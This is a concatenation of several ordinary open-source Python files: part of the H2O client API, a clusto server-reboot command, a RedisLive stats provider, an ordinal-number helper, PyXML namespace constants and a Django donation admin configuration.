    :param positive_response: when the response variable is present and of real type, this will control whether it
contains positive values only, or both positive and negative.
:param seed: a seed used to generate random values when ``randomize`` is True.
:param seed_for_column_types: a seed used to generate random column types when ``randomize`` is True.
:returns: an :class:`H2OFrame` object
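    :examples: A small sketch generating a random 100x5 frame with some categorical columns (all values illustrative):
    >>> fr = h2o.create_frame(rows=100, cols=5, categorical_fraction=0.2, factors=5, seed=1234)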
"""
t_fraction = U(None, BoundNumeric(0, 1))
assert_is_type(frame_id, str, None)
assert_is_type(rows, BoundInt(1))
assert_is_type(cols, BoundInt(1))
assert_is_type(randomize, bool)
assert_is_type(value, numeric)
assert_is_type(real_range, BoundNumeric(0))
assert_is_type(real_fraction, t_fraction)
assert_is_type(categorical_fraction, t_fraction)
assert_is_type(integer_fraction, t_fraction)
assert_is_type(binary_fraction, t_fraction)
assert_is_type(time_fraction, t_fraction)
assert_is_type(string_fraction, t_fraction)
assert_is_type(missing_fraction, t_fraction)
assert_is_type(binary_ones_fraction, t_fraction)
assert_is_type(factors, BoundInt(1))
assert_is_type(integer_range, BoundInt(1))
assert_is_type(has_response, bool)
assert_is_type(response_factors, None, BoundInt(1))
assert_is_type(positive_response, bool)
assert_is_type(seed, int, None)
assert_is_type(seed_for_column_types, int, None)
check_frame_id(frame_id)
if randomize and value:
raise H2OValueError("Cannot set data to a `value` if `randomize` is true")
if (categorical_fraction or integer_fraction) and not randomize:
raise H2OValueError("`randomize` should be True when either categorical or integer columns are used.")
# The total column fraction that the user has specified explicitly. This sum should not exceed 1. We will respect
# all explicitly set fractions, and will auto-select the remaining fractions.
frcs = [real_fraction, categorical_fraction, integer_fraction, binary_fraction, time_fraction, string_fraction]
wgts = [0.5, 0.2, 0.2, 0.1, 0.0, 0.0]
sum_explicit_fractions = sum(0 if f is None else f for f in frcs)
count_explicit_fractions = sum(0 if f is None else 1 for f in frcs)
remainder = 1 - sum_explicit_fractions
if sum_explicit_fractions >= 1 + 1e-10:
raise H2OValueError("Fractions of binary, integer, categorical, time and string columns should add up "
"to a number less than 1.")
elif sum_explicit_fractions >= 1 - 1e-10:
# The fractions already add up to almost 1. No need to do anything (the server will absorb the tiny
# remainder into the real_fraction column).
pass
else:
# sum_explicit_fractions < 1 => distribute the remainder among the columns that were not set explicitly
if count_explicit_fractions == 6:
raise H2OValueError("Fraction of binary, integer, categorical, time and string columns add up to a "
"number less than 1.")
# Each column type receives a certain part (proportional to column's "weight") of the remaining fraction.
sum_implicit_weights = sum(wgts[i] if frcs[i] is None else 0 for i in range(6))
for i, f in enumerate(frcs):
if frcs[i] is not None: continue
if sum_implicit_weights == 0:
frcs[i] = remainder
else:
frcs[i] = remainder * wgts[i] / sum_implicit_weights
remainder -= frcs[i]
sum_implicit_weights -= wgts[i]
for i, f in enumerate(frcs):
if f is None:
frcs[i] = 0
real_fraction, categorical_fraction, integer_fraction, binary_fraction, time_fraction, string_fraction = frcs
parms = {"dest": frame_id if frame_id else py_tmp_key(append=h2oconn.session_id),
"rows": rows,
"cols": cols,
"randomize": randomize,
"categorical_fraction": categorical_fraction,
"integer_fraction": integer_fraction,
"binary_fraction": binary_fraction,
"time_fraction": time_fraction,
"string_fraction": string_fraction,
# "real_fraction" is not provided, the backend computes it as 1 - sum(5 other fractions)
"value": value,
"real_range": real_range,
"factors": factors,
"integer_range": integer_range,
"binary_ones_fraction": binary_ones_fraction,
"missing_fraction": missing_fraction,
"has_response": has_response,
"response_factors": response_factors,
"positive_response": positive_response,
"seed": -1 if seed is None else seed,
"seed_for_column_types": -1 if seed_for_column_types is None else seed_for_column_types,
}
H2OJob(api("POST /3/CreateFrame", data=parms), "Create Frame").poll()
return get_frame(parms["dest"])
def interaction(data, factors, pairwise, max_factors, min_occurrence, destination_frame=None):
"""
Categorical Interaction Feature Creation in H2O.
Creates a frame in H2O with n-th order interaction features between categorical columns, as specified by
the user.
:param data: the H2OFrame that holds the target categorical columns.
:param factors: factor columns (either indices or column names).
:param pairwise: If True, create pairwise interactions between factors (otherwise create one
higher-order interaction). Only applicable if there are 3 or more factors.
:param max_factors: Max. number of factor levels in pair-wise interaction terms (if enforced, one extra
catch-all factor will be made).
:param min_occurrence: Min. occurrence threshold for factor levels in pair-wise interaction terms
:param destination_frame: a string indicating the destination key. If empty, this will be auto-generated by H2O.
:returns: :class:`H2OFrame`
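    :examples: (``df`` and the column names are illustrative)
    >>> pairs = h2o.interaction(df, factors=["cat_a", "cat_b"], pairwise=True,
    ...                         max_factors=100, min_occurrence=1)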
"""
assert_is_type(data, H2OFrame)
assert_is_type(factors, [str, int])
assert_is_type(pairwise, bool)
assert_is_type(max_factors, int)
assert_is_type(min_occurrence, int)
assert_is_type(destination_frame, str, None)
factors = [data.names[n] if is_type(n, int) else n for n in factors]
parms = {"dest": py_tmp_key(append=h2oconn.session_id) if destination_frame is None else destination_frame,
"source_frame": data.frame_id,
"factor_columns": [quoted(f) for f in factors],
"pairwise": pairwise,
"max_factors": max_factors,
"min_occurrence": min_occurrence,
}
H2OJob(api("POST /3/Interaction", data=parms), "Interactions").poll()
return get_frame(parms["dest"])
def as_list(data, use_pandas=True, header=True):
"""
Convert an H2O data object into a python-specific object.
WARNING! This will pull all data local!
If Pandas is available (and use_pandas is True), then pandas will be used to parse the
data frame. Otherwise, a list-of-lists populated by character data will be returned (so
the types of data will all be str).
:param data: an H2O data object.
:param use_pandas: If True, try to use pandas for reading in the data.
:param header: If True, return column names as first element in list
:returns: List of lists (Rows x Columns).
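    :examples: (``fr`` is assumed to be an existing H2OFrame)
    >>> rows = h2o.as_list(fr, use_pandas=False)  # plain list of lists
    >>> df = h2o.as_list(fr)                      # pandas DataFrame, if pandas is installed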
"""
assert_is_type(data, H2OFrame)
assert_is_type(use_pandas, bool)
assert_is_type(header, bool)
return H2OFrame.as_data_frame(data, use_pandas=use_pandas, header=header)
def demo(funcname, interactive=True, echo=True, test=False):
"""
H2O built-in demo facility.
:param funcname: A string that identifies the h2o python function to demonstrate.
:param interactive: If True, the user will be prompted to continue the demonstration after every segment.
:param echo: If True, the python commands that are executed will be displayed.
:param test: If True, `h2o.init()` will not be called (used for pyunit testing).
:example:
>>> import h2o
>>> h2o.demo("gbm")
"""
import h2o.demos as h2odemo
assert_is_type(funcname, str)
assert_is_type(interactive, bool)
assert_is_type(echo, bool)
assert_is_type(test, bool)
demo_function = getattr(h2odemo, funcname, None)
if demo_function and type(demo_function) is type(demo):
demo_function(interactive, echo, test)
else:
print("Demo for %s is not available." % funcname)
def load_dataset(relative_path):
"""Imports a data file within the 'h2o_data' folder."""
assert_is_type(relative_path, str)
h2o_dir = os.path.split(__file__)[0]
for possible_file in [os.path.join(h2o_dir, relative_path),
os.path.join(h2o_dir, "h2o_data", relative_path),
os.path.join(h2o_dir, "h2o_data", relative_path + ".csv")]:
if os.path.exists(possible_file):
return upload_file(possible_file)
# File not found -- raise an error!
raise H2OValueError("Data file %s cannot be found" % relative_path)
def make_metrics(predicted, actual, domain=None, distribution=None):
"""
Create Model Metrics from predicted and actual values in H2O.
:param H2OFrame predicted: an H2OFrame containing predictions.
    :param H2OFrame actual: an H2OFrame containing actual values.
:param domain: list of response factors for classification.
:param distribution: distribution for regression.
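    :examples: (``pred`` and ``actual`` are assumed to be existing single-column frames)
    >>> mm = h2o.make_metrics(pred, actual, distribution="gaussian")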
"""
assert_is_type(predicted, H2OFrame)
assert_is_type(actual, H2OFrame)
# assert predicted.ncol == 1, "`predicted` frame should have exactly 1 column"
assert actual.ncol == 1, "`actual` frame should have exactly 1 column"
assert_is_type(distribution, str, None)
assert_satisfies(actual.ncol, actual.ncol == 1)
if domain is None and any(actual.isfactor()):
domain = actual.levels()[0]
res = api("POST /3/ModelMetrics/predictions_frame/%s/actuals_frame/%s" % (predicted.frame_id, actual.frame_id),
data={"domain": domain, "distribution": distribution})
return res["model_metrics"]
def flow():
"""
Open H2O Flow in your browser.
"""
webbrowser.open(connection().base_url, new = 1)
#-----------------------------------------------------------------------------------------------------------------------
# Private
#-----------------------------------------------------------------------------------------------------------------------
def _check_connection():
if not h2oconn or not h2oconn.cluster:
raise H2OConnectionError("Not connected to a cluster. Did you run `h2o.connect()`?")
def _connect_with_conf(conn_conf):
conf = conn_conf
if isinstance(conn_conf, dict):
conf = H2OConnectionConf(config=conn_conf)
assert_is_type(conf, H2OConnectionConf)
    return connect(url=conf.url, verify_ssl_certificates=conf.verify_ssl_certificates,
                   auth=conf.auth, proxy=conf.proxy, cookies=conf.cookies, verbose=conf.verbose)
#-----------------------------------------------------------------------------------------------------------------------
# ALL DEPRECATED METHODS BELOW
#-----------------------------------------------------------------------------------------------------------------------
# Deprecated since 2015-10-08
@deprecated("Deprecated, use ``h2o.import_file()``.")
def import_frame():
"""Deprecated."""
import_file()
# Deprecated since 2015-10-08
@deprecated("Deprecated (converted to a private method).")
def parse():
"""Deprecated."""
pass
# Deprecated since 2016-08-04
@deprecated("Deprecated, use ``h2o.cluster().show_status()``.")
def cluster_info():
"""Deprecated."""
_check_connection()
cluster().show_status()
# Deprecated since 2016-08-04
@deprecated("Deprecated, use ``h2o.cluster().show_status(True)``.")
def cluster_status():
"""Deprecated."""
_check_connection()
cluster().show_status(True)
# Deprecated since 2016-08-04
@deprecated("Deprecated, use ``h2o.cluster().shutdown()``.")
def shutdown(prompt=False):
"""Deprecated."""
_check_connection()
cluster().shutdown(prompt)
# Deprecated since 2016-08-04
@deprecated("Deprecated, use ``h2o.cluster().network_test()``.")
def network_test():
"""Deprecated."""
_check_connection()
cluster().network_test()
# Deprecated since 2016-08-04
@deprecated("Deprecated, use ``h2o.cluster().timezone``.")
def get_timezone():
"""Deprecated."""
_check_connection()
return cluster().timezone
# Deprecated since 2016-08-04
@deprecated("Deprecated, set ``h2o.cluster().timezone`` instead.")
def set_timezone(value):
"""Deprecated."""
_check_connection()
cluster().timezone = value
# Deprecated since 2016-08-04
@deprecated("Deprecated, use ``h2o.cluster().list_timezones()``.")
def list_timezones():
"""Deprecated."""
_check_connection()
return cluster().list_timezones()
| mathemage/h2o-3 | h2o-py/h2o/h2o.py | Python | apache-2.0 | 62,868 |
#!/usr/bin/env python
# -*- mode: python; sh-basic-offset: 4; indent-tabs-mode: nil; coding: utf-8 -*-
# vim: tabstop=4 softtabstop=4 expandtab shiftwidth=4 fileencoding=utf-8
import argparse
import sys
import clusto
from clusto import script_helper
class Reboot(script_helper.Script):
'''
This will reboot a given server or IP address
'''
def __init__(self):
script_helper.Script.__init__(self)
def _add_arguments(self, parser):
parser.add_argument('--batch', action='store_true', default=False,
help='Batch mode, don\'t prompt for confirmation')
parser.add_argument('--method', default=None,
help='Use the given method to reboot this server (eg. ipmi)')
parser.add_argument('server', nargs='+',
help='Server name or IP address')
def add_subparser(self, subparsers):
parser = self._setup_subparser(subparsers)
self._add_arguments(parser)
def confirm(self, server):
print 'Parents: %s' % ' '.join([x.name for x in server.parents()])
response = raw_input('Are you sure you want to reboot %s (yes/no)? ' % server.name)
        return response == 'yes'
def run(self, args):
for name in args.server:
server = clusto.get(name)
if not server:
self.error('%s does not exist' % name)
continue
server = server[0]
if not hasattr(server, 'reboot'):
self.error('%s does not implement reboot()' % server.name)
return -1
if not args.batch:
if not self.confirm(server):
return -1
kwargs = {}
if args.method is not None:
kwargs['method'] = args.method
server.reboot(**kwargs)
def main():
reboot = Reboot()
parent_parser = script_helper.setup_base_parser()
this_parser = argparse.ArgumentParser(parents=[parent_parser],
description=reboot._get_description())
reboot._add_arguments(this_parser)
args = this_parser.parse_args()
reboot.init_script(args=args, logger=script_helper.get_logger(args.loglevel))
return(reboot.run(args))
if __name__ == '__main__':
sys.exit(main())
| motivator/clusto | src/clusto/commands/reboot.py | Python | bsd-3-clause | 2,325 |
from api.util import settings, timeutils
from datetime import datetime, timedelta
import redis
import json
import ast
class RedisStatsProvider(object):
"""A Redis based persistance to store and fetch stats"""
def __init__(self):
# redis server to use to store stats
stats_server = settings.get_redis_stats_server()
self.server = stats_server["server"]
self.port = stats_server["port"]
self.password = stats_server.get("password")
self.conn = redis.StrictRedis(host=self.server, port=self.port, db=0, password=self.password)
def save_memory_info(self, server, timestamp, used, peak):
"""Saves used and peak memory stats,
Args:
server (str): The server ID
timestamp (datetime): The time of the info.
used (int): Used memory value.
peak (int): Peak memory value.
"""
data = {"timestamp": str(timeutils.convert_to_epoch(timestamp)),
"used": used,
"peak": peak}
self.conn.zadd(server + ":memory", str(timeutils.convert_to_epoch(timestamp)), data)
def save_info_command(self, server, timestamp, info):
"""Save Redis info command dump
Args:
server (str): id of server
timestamp (datetime): Timestamp.
info (dict): The result of a Redis INFO command.
"""
self.conn.set(server + ":Info", json.dumps(info))
def save_monitor_command(self, server, timestamp, command, keyname,
argument):
"""save information about every command
Args:
server (str): Server ID
timestamp (datetime): Timestamp.
command (str): The Redis command used.
keyname (str): The key the command acted on.
argument (str): The args sent to the command.
"""
epoch = str(timeutils.convert_to_epoch(timestamp))
current_date = timestamp.strftime('%y%m%d')
# start a redis MULTI/EXEC transaction
pipeline = self.conn.pipeline()
# store top command and key counts in sorted set for every second
# top N are easily available from sorted set in redis
# also keep a sorted set for every day
        # switch to daily stats when the requested stats span a longer time period
command_count_key = server + ":CommandCount:" + epoch
pipeline.zincrby(command_count_key, command, 1)
command_count_key = server + ":DailyCommandCount:" + current_date
pipeline.zincrby(command_count_key, command, 1)
key_count_key = server + ":KeyCount:" + epoch
pipeline.zincrby(key_count_key, keyname, 1)
key_count_key = server + ":DailyKeyCount:" + current_date
pipeline.zincrby(key_count_key, keyname, 1)
# keep aggregate command in a hash
command_count_key = server + ":CommandCountBySecond"
pipeline.hincrby(command_count_key, epoch, 1)
command_count_key = server + ":CommandCountByMinute"
field_name = current_date + ":" + str(timestamp.hour) + ":"
field_name += str(timestamp.minute)
pipeline.hincrby(command_count_key, field_name, 1)
command_count_key = server + ":CommandCountByHour"
field_name = current_date + ":" + str(timestamp.hour)
pipeline.hincrby(command_count_key, field_name, 1)
command_count_key = server + ":CommandCountByDay"
field_name = current_date
pipeline.hincrby(command_count_key, field_name, 1)
# commit transaction to redis
pipeline.execute()
def get_info(self, server):
"""Get info about the server
Args:
server (str): The server ID
"""
        info = self.conn.get(server + ":Info")
        if info is None:
            # The collector has never been run for this server: avoid passing
            # None to json.loads (which would raise) and return an empty dict.
            return {}
        return json.loads(info)
def get_memory_info(self, server, from_date, to_date):
"""Get stats for Memory Consumption between a range of dates
Args:
server (str): The server ID
from_date (datetime): Get memory info from this date onwards.
to_date (datetime): Get memory info up to this date.
"""
memory_data = []
start = timeutils.convert_to_epoch(from_date)
end = timeutils.convert_to_epoch(to_date)
rows = self.conn.zrangebyscore(server + ":memory", start, end)
        for row in rows:
            # Each row was stored as the string form of a python dict;
            # ast.literal_eval safely turns it back into a dict (unlike
            # eval, it only accepts python literals).
            row = ast.literal_eval(row)
            # convert the timestamp
            timestamp = datetime.fromtimestamp(int(row['timestamp']))
            timestamp = timestamp.strftime('%Y-%m-%d %H:%M:%S')
            memory_data.append([timestamp, row['peak'], row['used']])
return memory_data
def get_command_stats(self, server, from_date, to_date, group_by):
"""Get total commands processed in the given time period
Args:
server (str): The server ID
from_date (datetime): Get data from this date.
to_date (datetime): Get data to this date.
group_by (str): How to group the stats.
"""
s = []
time_stamps = []
key_name = ""
if group_by == "day":
key_name = server + ":CommandCountByDay"
t = from_date.date()
while t <= to_date.date():
s.append(t.strftime('%y%m%d'))
time_stamps.append(str(timeutils.convert_to_epoch(t)))
t = t + timedelta(days=1)
elif group_by == "hour":
key_name = server + ":CommandCountByHour"
t = from_date
while t<= to_date:
field_name = t.strftime('%y%m%d') + ":" + str(t.hour)
s.append(field_name)
time_stamps.append(str(timeutils.convert_to_epoch(t)))
t = t + timedelta(seconds=3600)
elif group_by == "minute":
key_name = server + ":CommandCountByMinute"
t = from_date
while t <= to_date:
field_name = t.strftime('%y%m%d') + ":" + str(t.hour)
field_name += ":" + str(t.minute)
s.append(field_name)
time_stamps.append(str(timeutils.convert_to_epoch(t)))
t = t + timedelta(seconds=60)
else:
key_name = server + ":CommandCountBySecond"
start = timeutils.convert_to_epoch(from_date)
end = timeutils.convert_to_epoch(to_date)
for x in range(start, end + 1):
s.append(str(x))
time_stamps.append(x)
data = []
counts = self.conn.hmget(key_name, s)
for x in xrange(0,len(counts)):
# the default time format string
time_fmt = '%Y-%m-%d %H:%M:%S'
if group_by == "day":
time_fmt = '%Y-%m-%d'
elif group_by == "hour":
time_fmt = '%Y-%m-%d %H:00:00'
elif group_by == "minute":
time_fmt = '%Y-%m-%d %H:%M:00'
# get the count.
try:
if counts[x] is not None:
count = int(counts[x])
else:
count = 0
except Exception as e:
count = 0
# convert the timestamp
timestamp = int(time_stamps[x])
timestamp = datetime.fromtimestamp(timestamp)
timestamp = timestamp.strftime(time_fmt)
# add to the data
data.append([count, timestamp])
return reversed(data)
def get_top_commands_stats(self, server, from_date, to_date):
"""Get top commands processed in the given time period
Args:
server (str): Server ID
from_date (datetime): Get stats from this date.
to_date (datetime): Get stats to this date.
"""
counts = self.get_top_counts(server, from_date, to_date, "CommandCount",
"DailyCommandCount")
return reversed(counts)
def get_top_keys_stats(self, server, from_date, to_date):
"""Gets top comm processed
Args:
server (str): Server ID
from_date (datetime): Get stats from this date.
to_date (datetime): Get stats to this date.
"""
return self.get_top_counts(server, from_date, to_date, "KeyCount",
"DailyKeyCount")
# Helper methods
def get_top_counts(self, server, from_date, to_date, seconds_key_name,
day_key_name, result_count=None):
"""Top counts are stored in a sorted set for every second and for every
day. ZUNIONSTORE across the timeperiods generates the results.
Args:
server (str): The server ID
from_date (datetime): Get stats from this date.
to_date (datetime): Get stats to this date.
seconds_key_name (str): The key for stats at second resolution.
day_key_name (str): The key for stats at daily resolution.
Kwargs:
result_count (int): The number of results to return. Default: 10
"""
if result_count is None:
result_count = 10
# get epoch
start = timeutils.convert_to_epoch(from_date)
end = timeutils.convert_to_epoch(to_date)
diff = to_date - from_date
# start a redis MULTI/EXEC transaction
pipeline = self.conn.pipeline()
# store the set names to use in ZUNIONSTORE in a list
s = []
        if diff.days > 2:
# when difference is over 2 days, no need to check counts for every second
# Calculate:
# counts of every second on the start day
# counts of every day in between
# counts of every second on the end day
next_day = from_date.date() + timedelta(days=1)
prev_day = to_date.date() - timedelta(days=1)
from_date_end_epoch = timeutils.convert_to_epoch(next_day) - 1
to_date_begin_epoch = timeutils.convert_to_epoch(to_date.date())
# add counts of every second on the start day
for x in range(start, from_date_end_epoch + 1):
s.append(":".join([server, seconds_key_name, str(x)]))
# add counts of all days in between
t = next_day
while t <= prev_day:
s.append(":".join([server, day_key_name, t.strftime('%y%m%d')]))
t = t + timedelta(days=1)
# add counts of every second on the end day
for x in range(to_date_begin_epoch, end + 1):
s.append(server + ":" + seconds_key_name + ":" + str(x))
else:
# add counts of all seconds between start and end date
for x in range(start, end + 1):
s.append(server + ":" + seconds_key_name + ":" + str(x))
# store the union of all the sets in a temp set
temp_key_name = "_top_counts"
pipeline.zunionstore(temp_key_name, s)
pipeline.zrange(temp_key_name, 0, result_count - 1, True, True)
pipeline.delete(temp_key_name)
# commit transaction to redis
results = pipeline.execute()
result_data = []
for val, count in results[-2]:
result_data.append([val, count])
return result_data
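# Usage sketch (assumes a reachable Redis stats server configured in settings;
# the server id and values are illustrative):
#
#   provider = RedisStatsProvider()
#   now = datetime.now()
#   provider.save_memory_info("server1", now, used=1024, peak=2048)
#   rows = provider.get_memory_info("server1", now - timedelta(hours=1), now)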
| fengshao0907/RedisLive | src/dataprovider/redisprovider.py | Python | mit | 11,733 |
def number_string_with_postfix(number):
    """Return the number with its English ordinal suffix, e.g. 1 -> "1st", 21 -> "21st"."""
    # 11, 12 and 13 are special-cased: "11th", not "11st"
    if 11 <= number % 100 <= 13:
        return "%sth" % number
    remainder = number % 10
    if remainder == 1:
        return "%sst" % number
    elif remainder == 2:
        return "%snd" % number
    elif remainder == 3:
        return "%srd" % number
    else:
        return "%sth" % number
| JBarberU/strawberry_py | util/number_helper.py | Python | mit | 186 |
"""NS module -- XML Namespace constants
This module contains the definitions of namespaces (and sometimes other
URI's) used by a variety of XML standards. Each class has a short
all-uppercase name, which should follow any (emerging) convention for
how that standard is commonly used. For example, ds is almost always
used as the namespace prefixes for items in XML Signature, so DS is the
class name. Attributes within that class, all uppercase, define symbolic
names (hopefully evocative) for "constants" used in that standard.
"""
class XMLNS:
"""XMLNS, Namespaces in XML
XMLNS (14-Jan-1999) is a W3C Recommendation. It is specified in
http://www.w3.org/TR/REC-xml-names
BASE -- the basic namespace defined by the specification
XML -- the namespace for XML 1.0
HTML -- the namespace for HTML4.0
"""
BASE = "http://www.w3.org/2000/xmlns/"
XML = "http://www.w3.org/XML/1998/namespace"
HTML = "http://www.w3.org/TR/REC-html40"
class XLINK:
"""XLINK, XML Linking Language
XLink (v1.0, 27-Jun-2001) is a W3C Recommendation. It is
specified in http://www.w3.org/TR/xlink/
"""
BASE = "http://www.w3.org/1999/xlink"
class SOAP:
"""SOAP, the Simple Object Access Protocol
SOAP (v1.1, 8-May-2000) is a W3C note. It is specified in
http://www.w3.org/TR/SOAP
ENV -- namespace for the SOAP envelope
ENC -- namespace for the SOAP encoding in section 5
ACTOR_NEXT -- the URI for the "next" actor
(Note that no BASE is defined.)
"""
ENV = "http://schemas.xmlsoap.org/soap/envelope/"
ENC = "http://schemas.xmlsoap.org/soap/encoding/"
ACTOR_NEXT = "http://schemas.xmlsoap.org/soap/actor/next"
class DSIG:
"""DSIG, XML-Signature Syntax and Processing
DSIG (19-Apr-2001) is a W3C Candidate Recommendation. It is specified
in http://www.w3.org/TR/xmldsig-core/
BASE -- the basic namespace defined by the specification
DIGEST_SHA1 -- The SHA-1 digest method
DIGEST_MD2 -- The MD2 digest method
DIGEST_MD5 -- The MD5 digest method
    SIG_DSA_SHA1 -- The DSA/SHA-1 signature method
    SIG_RSA_SHA1 -- The RSA/SHA-1 signature method
HMAC_SHA1 -- The SHA-1 HMAC method
ENC_BASE64 -- The Base64 encoding method
ENVELOPED -- an enveloped XML signature
C14N -- XML canonicalization
C14N_COMM -- XML canonicalization, retaining comments
C14N_EXCL -- XML exclusive canonicalization
XPATH -- The identifier for an XPATH transform
XSLT -- The identifier for an XSLT transform
"""
BASE = "http://www.w3.org/2000/09/xmldsig#"
DIGEST_SHA1 = BASE + "sha1"
DIGEST_MD2 = BASE + "md2"
DIGEST_MD5 = BASE + "md5"
SIG_DSA_SHA1= BASE + "dsa-sha1"
SIG_RSA_SHA1= BASE + "rsa-sha1"
HMAC_SHA1 = BASE + "hmac-sha1"
ENC_BASE64 = BASE + "base64"
ENVELOPED = BASE + "enveloped-signature"
C14N = "http://www.w3.org/TR/2000/CR-xml-c14n-20010315"
C14N_COMM = C14N + "#WithComments"
C14N_EXCL = "http://www.w3.org/2001/10/xml-exc-c14n#"
XPATH = "http://www.w3.org/TR/1999/REC-xpath-19991116"
XSLT = "http://www.w3.org/TR/1999/REC-xslt-19991116"
class ENCRYPTION:
"""ENCRYPTION, XML-Encryption Syntax and Processing
ENCRYPTION (26-Jun-2001) is a W3C Working Draft. It is specified in
http://www.w3.org/TR/xmlenc-core/
BASE -- the basic namespace defined by the specification
BLOCK_3DES -- The triple-DES symmetric encryption method
BLOCK_AES128 -- The 128-bit AES symmetric encryption method
BLOCK_AES256 -- The 256-bit AES symmetric encryption method
BLOCK_AES192 -- The 192-bit AES symmetric encryption method
STREAM_ARCFOUR -- The ARCFOUR symmetric encryption method
KT_RSA_1_5 -- The RSA v1.5 key transport method
KT_RSA_OAEP -- The RSA OAEP key transport method
KA_DH -- The Diffie-Hellman key agreement method
WRAP_3DES -- The triple-DES symmetric key wrap method
WRAP_AES128 -- The 128-bit AES symmetric key wrap method
WRAP_AES256 -- The 256-bit AES symmetric key wrap method
WRAP_AES192 -- The 192-bit AES symmetric key wrap method
DIGEST_SHA256 -- The SHA-256 digest method
DIGEST_SHA512 -- The SHA-512 digest method
DIGEST_RIPEMD160 -- The RIPEMD-160 digest method
"""
BASE = "http://www.w3.org/2001/04/xmlenc#"
BLOCK_3DES = BASE + "des-cbc"
BLOCK_AES128 = BASE + "aes128-cbc"
BLOCK_AES256 = BASE + "aes256-cbc"
BLOCK_AES192 = BASE + "aes192-cbc"
STREAM_ARCFOUR = BASE + "arcfour"
KT_RSA_1_5 = BASE + "rsa-1_5"
KT_RSA_OAEP = BASE + "rsa-oaep-mgf1p"
KA_DH = BASE + "dh"
WRAP_3DES = BASE + "kw-3des"
WRAP_AES128 = BASE + "kw-aes128"
WRAP_AES256 = BASE + "kw-aes256"
WRAP_AES192 = BASE + "kw-aes192"
DIGEST_SHA256 = BASE + "sha256"
DIGEST_SHA512 = BASE + "sha512"
DIGEST_RIPEMD160 = BASE + "ripemd160"
class SCHEMA:
"""SCHEMA, XML Schema
XML Schema (30-Mar-2001) is a W3C candidate recommendation. It is
specified in http://www.w3.org/TR/xmlschema-1 (Structures) and
http://www.w3.org/TR/xmlschema-2 (Datatypes). Schema has been under
    development for a comparatively long time, and other standards have
at times used earlier drafts. This class defines the most-used, and
sets BASE to the latest.
BASE -- the basic namespace (2001)
XSD1, XSI1 -- schema and schema-instance for 1999
XSD2, XSI2 -- schema and schema-instance for October 2000
XSD3, XSI3 -- schema and schema-instance for 2001
XSD_LIST -- a sequence of the XSDn values
XSI_LIST -- a sequence of the XSIn values
"""
XSD1 = "http://www.w3.org/1999/XMLSchema"
XSD2 = "http://www.w3.org/2000/10/XMLSchema"
XSD3 = "http://www.w3.org/2001/XMLSchema"
XSD_LIST = [ XSD1, XSD2, XSD3 ]
XSI1 = "http://www.w3.org/1999/XMLSchema-instance"
XSI2 = "http://www.w3.org/2000/10/XMLSchema-instance"
XSI3 = "http://www.w3.org/2001/XMLSchema-instance"
XSI_LIST = [ XSI1, XSI2, XSI3 ]
BASE = XSD3
class XSLT:
"""XSLT, XSL Transformations
XSLT (16-Nov-1999) is a W3C Recommendation. It is specified in
http://www.w3.org/TR/xslt/
BASE -- the basic namespace defined by this specification
"""
BASE = "http://www.w3.org/1999/XSL/Transform"
class XPATH:
"""XPATH, XML Path Language
XPATH (16-Nov-1999) is a W3C Recommendation. It is specified in
http://www.w3.org/TR/xpath. This class is currently empty.
"""
pass
class WSDL:
"""WSDL, Web Services Description Language
WSDL (V1.1, 15-Mar-2001) is a W3C Note. It is specified in
http://www.w3.org/TR/wsdl
BASE -- the basic namespace defined by this specification
BIND_SOAP -- SOAP binding for WSDL
BIND_HTTP -- HTTP GET and POST binding for WSDL
BIND_MIME -- MIME binding for WSDL
"""
BASE = "http://schemas.xmlsoap.org/wsdl/"
BIND_SOAP = BASE + "soap/"
BIND_HTTP = BASE + "http/"
BIND_MIME = BASE + "mime/"
class RNG:
"""RELAX NG, schema language for XML
    RELAX NG (03-Dec-2001) is a simple schema language for XML,
published under the auspices of OASIS. The specification, tutorial,
and other information are available from http://www.relaxng.org.
"""
BASE = "http://relaxng.org/ns/structure/1.0"
class DCMI:
"""Dublin Core Metadata Initiative
The DCMI defines a commonly-used set of general metadata elements.
There is a base set of elements, a variety of refinements of
those, a set of value encodings, and a 'type vocabulary' used to
describe what something described in metadata actually is (a text,
a physical object, a collection, etc.).
Documentation on the Dublin Core, including recommendations for
encoding Dublin Core metadata in XML and HTML/XHTML can be found
at http://dublincore.org/.
"""
# not used directly:
BASE = "http://purl.org/dc/"
# the core element set:
DCMES_1_1 = BASE + "elements/1.1/"
DCMES = DCMES_1_1
# standardized additions and refinements:
TERMS = BASE + "terms/"
# type vocabulary:
TYPE = BASE + "dcmitype/"
class _Namespace:
"""Base class for Namespace classes.
Namespace objects are a convenient way to 'spell' (uri, localName)
pairs in application code. A namespace object would be created to
represent a namespace (URI), and attributes of the namespace
object would represent the (uri, localName) pairs.
For example, a namespace object would be created by providing the
    URI and any known local names for that namespace to the
constructor:
xbel = pyxml.ns.ClosedNamespace(
'http://www.python.org/topics/xml/xbel/',
['xbel', 'title', 'info', 'metadata', 'folder', 'bookmark',
'desc', 'separator', 'alias'])
Specific (uri, localName) pairs can then be referenced by more
convenient names:
xbel.title # ==> ('http://www.python.org/topics/xml/xbel/', 'title')
This can be convenient in (for example) SAX ContentHandler
implementations.
"""
def __init__(self, uri, names):
d = self.__dict__
for name in names:
d[name] = (uri, name)
class ClosedNamespace(_Namespace):
"""Namespace that doesn't allow names to be added after instantiation.
This is useful when the set of names for the namespace is known in
advance; using a ClosedNamespace doesn't allow names to be added
inadvertently.
"""
def __setattr__(self, name, value):
raise AttributeError("can't set attributes on a ClosedNamespace")
class OpenNamespace(_Namespace):
"""Namespace that allows names to be added automatically.
When attributes of these objects are referenced, (uri, localName)
pairs are generated for the name if they don't already exist.
"""
def __init__(self, uri, names=()):
_Namespace.__init__(self, uri, names)
self.__uri = uri
def __getattr__(self, name):
t = self.__uri, name
setattr(self, name, t)
return t
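# Example: an OpenNamespace generates (uri, localName) pairs on demand; the
# Dublin Core URI below reuses the DCMI constants defined in this module.
#
#   dc = OpenNamespace(DCMI.DCMES)
#   dc.title   # ==> ('http://purl.org/dc/elements/1.1/', 'title')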
| wuzhenda/gaedav | pyxml/ns.py | Python | lgpl-2.1 | 10,457 |
from django.contrib import admin
from alert.donate.models import Donation
from alert.userHandling.models import UserProfile
class DonorInline(admin.TabularInline):
model = UserProfile.donation.through
max_num = 1
raw_id_fields = (
'userprofile',
)
class DonationAdmin(admin.ModelAdmin):
readonly_fields = (
'date_modified',
'date_created',
)
list_display = (
'__str__',
'amount',
'payment_provider',
'status',
'date_created',
'referrer',
)
list_filter = (
'payment_provider',
'status',
'referrer',
)
inlines = (
DonorInline,
)
admin.site.register(Donation, DonationAdmin)
